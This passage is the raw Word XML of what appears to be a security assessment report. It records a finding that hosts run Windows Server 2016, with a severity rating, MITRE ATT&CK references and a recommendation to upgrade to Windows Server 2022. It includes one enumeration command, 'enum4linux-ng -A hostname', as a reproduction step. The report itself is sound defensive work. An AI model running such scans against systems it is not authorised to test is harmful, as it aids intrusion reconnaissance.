          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="53C1DFE5" w:rsidP="0D325B6E" w:rsidRDefault="53C1DFE5" w14:paraId="02F4010E" w14:textId="6DDB114B">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961541B" w:rsidP="0D325B6E" w:rsidRDefault="7961541B" w14:paraId="2ADD617F" w14:textId="1D41F0F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961541B">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D325B6E" w:rsidR="24DA4F70">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>identifi</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="7961541B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">ed hosts are </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="23704BB9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>runn</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="7961541B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">ing Windows Server 2016, </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="6FDA0CBB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>an operating system</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="7961541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FDA0CBB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">that </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="4FD94960">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">will no </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="12DBD52E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>lo</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="6FDA0CBB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nger</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="1B26CC06">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> be</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="6FDA0CBB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> supported with regular security updates by Microsoft</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="31470E87">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> after 2027</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="6FDA0CBB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. This </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means that future vulnerabi</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litie</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 xml:space="preserve">s </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w</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on’t</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 xml:space="preserve">be </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="03552119">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>patched and</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="6164F92C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> can be exploited by attackers</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="7304A0F9">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48169937" w14:textId="65602AD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3C1DFE5" w:rsidP="0D325B6E" w:rsidRDefault="53C1DFE5" w14:paraId="69CFCF45" w14:textId="3FAB856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1B843C85" w:rsidP="0D325B6E" w:rsidRDefault="1B843C85" w14:paraId="42B99142" w14:textId="031D8B15">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B843C85">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">In the future, as new vulnerabilities are discovered, this can be an issue to the company as much of the core infrastructure uses Windows Server 2016. If these machines are compromised, the operational integrity of the entire network will be in danger, </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="1B843C85">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>possibly leading</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="1B843C85">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="22AC9445">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>loss of life.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="5F5F0821" w14:textId="27417F0B">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3C1DFE5" w:rsidP="0D325B6E" w:rsidRDefault="53C1DFE5" w14:paraId="0B73A6D8" w14:textId="5F08CAD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53C1DFE5" w:rsidP="0D325B6E" w:rsidRDefault="53C1DFE5" w14:paraId="51B8FD93" w14:textId="7F86906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0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Step 1:</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 Use enum4linux-ng to scan the host</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6ECEB125" w:rsidP="0D325B6E" w:rsidRDefault="6ECEB125" w14:paraId="204FD453" w14:textId="326F59B0">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enum4linux-ng-A hostname </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6ECEB125" w:rsidP="0D325B6E" w:rsidRDefault="6ECEB125" w14:paraId="4EFFB4E4" w14:textId="0E21E3E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 the </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="76A1F380">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>o</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perating </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="05DF369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 xml:space="preserve">ystem </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="05DF3699">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>v</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="6ECEB125">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ersion to be Windows Server 2016</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="775D32CA" w14:textId="3F5A1119">
      <w:pPr>
        <w:bidi w:val="0"/>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53C1DFE5" w:rsidP="0D325B6E" w:rsidRDefault="53C1DFE5" w14:paraId="4EA22A4F" w14:textId="2E1C5C6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53C1DFE5" w:rsidP="0D325B6E" w:rsidRDefault="53C1DFE5" w14:paraId="3D96152E" w14:textId="3FB9F3DD">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53C1DFE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w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="76000587">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>the following:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="76000587" w:rsidP="0D325B6E" w:rsidRDefault="76000587" w14:paraId="41DF86DE" w14:textId="3FBBE31C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="101"/>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6000587">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Update all servers running Windows Server 2016 to the latest version of Windows Server 2022</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="6AFFD222" w14:textId="2D638357">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53C1DFE5" w:rsidP="0D325B6E" w:rsidRDefault="53C1DFE5" w14:paraId="7ABA4BF7" w14:textId="526CAC4F">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53C1DFE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507509B" w:rsidP="0D325B6E" w:rsidRDefault="0507509B" w14:paraId="1A171334" w14:textId="4866131F">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:spacing w:after="0" w:afterAutospacing="off"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="R37939fc60efe4bd3">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="0507509B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:caps w:val="0"/>
            <w:smallCaps w:val="0"/>
            <w:noProof w:val="0"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Microsoft - Windows Server 2016 Lifecycle</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="4E7BAD8B" w14:textId="651595F8">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="7C0684CD" w:rsidP="0D325B6E" w:rsidRDefault="7C0684CD" w14:paraId="684E4FC7" w14:textId="4CFE76C4">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="7C0684CD">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:color w:val="4C94D8" w:themeColor="text2" w:themeTint="80" w:themeShade="FF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>▌</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="7C0684CD">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeTint="FF" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">I1: Deprecated Windows 10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72234A7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9CAEEA3" w14:textId="7871627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968ABE0" w14:textId="1FFBC55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33CAE6E" w14:textId="677D6721">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6308E861">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C92CFE5" w14:textId="2B5AB96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76ABE6DA" w14:textId="7EA8683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198A05A2" w14:textId="549B744C">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E16FDDE" w14:textId="7DEE179C">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5FD4392A">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33714C4" w14:textId="4954B01D">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D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="5731F4D4" w14:textId="7A164BBD">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:suppressLineNumbers w:val="0"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="279" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Medium</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0CB10634"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4365" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:sz="0"/>
              <w:left w:val="single" w:color="000000" w:themeColor="text1" w:sz="0"/>
              <w:bottom w:val="single" w:color="000000" w:themeColor="text1" w:sz="0"/>
              <w:right w:val="single" w:color="000000" w:themeColor="text1" w:sz="0"/>
            </w:tcBorders>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3082650E"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="20BA6229">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FBD11DA" w14:textId="5905B77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D1F5F1B" w14:textId="0758BD2C">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257FF072">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ED2FD1C" w14:textId="04360ADC">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F1EC196" w14:textId="76661679">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4F1485C" w14:textId="7D13CBAB">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="Raf5e4257d6ef4e9e">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                </w:rPr>
                <w:t>T1595: Active Scanning</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="357DAAD0">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2F01838B"/>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EE6301C" w14:textId="500436EE">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5B21FE02" w14:textId="34AA034D">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="Ra5e17c38b2144235">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                </w:rPr>
                <w:t>M1051: Update Software</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="17B6488A">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E482AF9" w14:textId="438A578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AA6C206" w14:textId="454D80FC">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="648ABEB1" w14:textId="54A40620">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="7C0684CD" w:rsidP="0D325B6E" w:rsidRDefault="7C0684CD" w14:paraId="76733732" w14:textId="6DDB114B">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C0684CD" w:rsidP="0D325B6E" w:rsidRDefault="7C0684CD" w14:paraId="34E3C034" w14:textId="1000A3DE">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0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The identified hosts </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="6C46A650">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
